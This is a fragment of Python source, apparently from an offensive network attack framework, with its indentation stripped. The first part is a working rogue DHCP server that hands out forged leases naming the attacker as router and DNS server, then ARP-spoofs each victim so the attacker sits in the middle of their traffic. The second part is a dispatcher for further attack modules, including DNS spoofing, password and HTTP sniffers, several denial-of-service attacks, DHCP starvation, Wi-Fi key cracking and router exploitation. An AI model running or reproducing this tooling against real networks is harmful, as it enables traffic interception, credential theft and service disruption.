def pkt_handler(self, pkt):
# is this a DHCP packet!?
if self.running and DHCP in pkt:
for opt in pkt[DHCP].options:
# if the option is a REQUEST
if type(opt) is tuple and opt[1] == 3:
fam,hw = get_if_raw_hwaddr(conf.iface)
# get the requested address
requested_addr = None
for item in pkt[DHCP].options:
if item[0] == 'requested_addr':
requested_addr = item[1]
# if the IP address is the one we've reserved for it, we're golden. Otherwise
# we need to check if the one they're requesting is free
if self.curr_ip != requested_addr:
if not requested_addr in self.spoofed_hosts:
# ip is free, set and use it
self.curr_ip = requested_addr
else:
# ip is in use; generate another
if self.curr_ip is None:
self.curr_ip = self.net_mask.split('/')[0]
else:
self.curr_ip = util.next_ip(self.curr_ip)
lease = Ether(dst='ff:ff:ff:ff:ff:ff',src=hw)/IP(src=self.gateway,dst='255.255.255.255')/UDP(sport=67,dport=68)
lease /= BOOTP(op=2,chaddr=mac2str(pkt[Ether].src),yiaddr=self.curr_ip,xid=pkt[BOOTP].xid)
lease /= DHCP(options=[('message-type','ack'),
('server_id', self.gateway),
('lease_time', 86400),
('subnet_mask', '255.255.255.0'),
('router', self.gateway),
('name_server', self.gateway),
'end'])
sendp(lease, loop=False)
if self.dump_data: util.Msg('Handed \'%s\' out to \'%s\''%(self.curr_ip, pkt[Ether].src))
util.debug('Initializing ARP spoofing...')
tmp = ARPSpoof()
tmp.to_ip = self.curr_ip
tmp.from_ip = self.gateway
if not tmp.initialize_post_spoof() is None:
self.spoofed_hosts[self.curr_ip] = tmp
util.debug('ARP spoofing successfully configured for \'%s\''%self.curr_ip)
else:
if self.dump_data: util.Error('ARP session unsuccessful for %s! You may not be able to get in the middle of them!'%self.curr_ip)
# discover; send offer
elif type(opt) is tuple and opt[1] == 1:
fam,hw = get_if_raw_hwaddr(conf.iface)
if self.curr_ip is None:
self.curr_ip = self.net_mask.split('/')[0]
else:
self.curr_ip = util.next_ip(self.curr_ip)
# build and send the DHCP Offer
offer = Ether(dst='ff:ff:ff:ff:ff:ff',src=hw)/IP(src=self.gateway,dst='255.255.255.255')/UDP(sport=67,dport=68)
offer /= BOOTP(op=2,chaddr=mac2str(pkt[Ether].src),yiaddr=self.curr_ip,xid=pkt[BOOTP].xid)
offer /= DHCP(options=[('message-type', 'offer'),
('subnet_mask','255.255.255.0'),
('lease_time', 86400),
('name_server', self.gateway),
('router',self.gateway),
'end'])
sendp(offer, loop=False)
if self.dump_data: util.Msg('Sent DHCP offer for \'%s\' to \'%s\''%(self.curr_ip, pkt[Ether].src))
def initialize(module):
global static_singles, arp_sessions, http_sniffers, password_sniffers, services
debug("Received module start for: %s"%(module))
if module == 'arp':
tmp = ARPSpoof()
to_ip = tmp.initialize()
if not to_ip is None:
debug("Storing session for %s"%to_ip)
arp_sessions[to_ip] = tmp
del(tmp)
elif module == 'dns':
dump_module_sessions('arp')
(module, number) = get_session_input()
ip = get_key(module,number)
if not ip is None:
arp_sessions[ip].init_dns_spoof()
elif module == 'dhcp':
tmp = DHCPSpoof()
if tmp.initialize():
static_singles['rogue_dhcp'] = tmp
elif module == 'ndp':
ndp_dos.initialize()
elif module == 'http_sniffer':
tmp = HTTPSniffer()
to_ip = tmp.initialize()
if not to_ip is None:
debug("Storing sniffer for %s"%to_ip)
http_sniffers[to_ip] = tmp
elif module == 'password_sniffer':
tmp = PasswordSniffer()
to_ip = tmp.initialize()
if not to_ip is None:
debug("Storing sniffer for %s"%to_ip)
password_sniffers[to_ip] = tmp
elif module == 'traffic_sniffer':
tmp = TrafficSniffer()
to_ip = tmp.initialize()
if not to_ip is None:
debug('Storing sniffer for %s'%to_ip)
traffic_sniffers[to_ip] = tmp
elif module == 'nestea':
nestea_dos.initialize()
elif module == 'land':
land_dos.initialize()
elif module == 'smb2':
smb2_dos.initialize()
elif module == 'net_map':
static_singles['netscan'] = NetMap()
static_singles['netscan'].initialize()
elif module == 'service_scan':
service_scan.initialize()
elif module == 'dhcp_starv':
dhcp_starvation.initialize()
elif module == 'ap_scan':
return ap_scan.initialize()
elif module == 'wep_crack':
ap_crack.initialize('wep')
elif module == 'wpa_crack':
ap_crack.initialize('wpa')
elif module == 'wps_crack':
ap_crack.initialize('wps')
elif module == 'router_pwn':
router_pwn.initialize()
elif module == 'tcp_syn':
tcp_syn.initialize()
elif module == 'nbns':
tmp = NBNSSpoof()
if tmp.initialize():
static_singles['nbnspoof'] = tmp
elif module == 'ftp_server':
tmp = FTPService()
tmp.initialize_bg()
services['ftp'] = tmp
elif module == 'http_server':
tmp = HTTPService()
tmp.initialize_bg()
services['http'] = tmp
elif module == 'ssh_server':
tmp = SSHService()
if not tmp.initialize_bg():
return
services['ssh'] = tmp
elif module == 'access_point':
tmp = APService()
if tmp.initialize_bg():
services['wireless ap'] = tmp
elif module == 'smb':
tmp = SMBService()
tmp.initialize_bg()
services['smb'] = tmp
else:
Error('Module \'%s\' does not exist.'%module)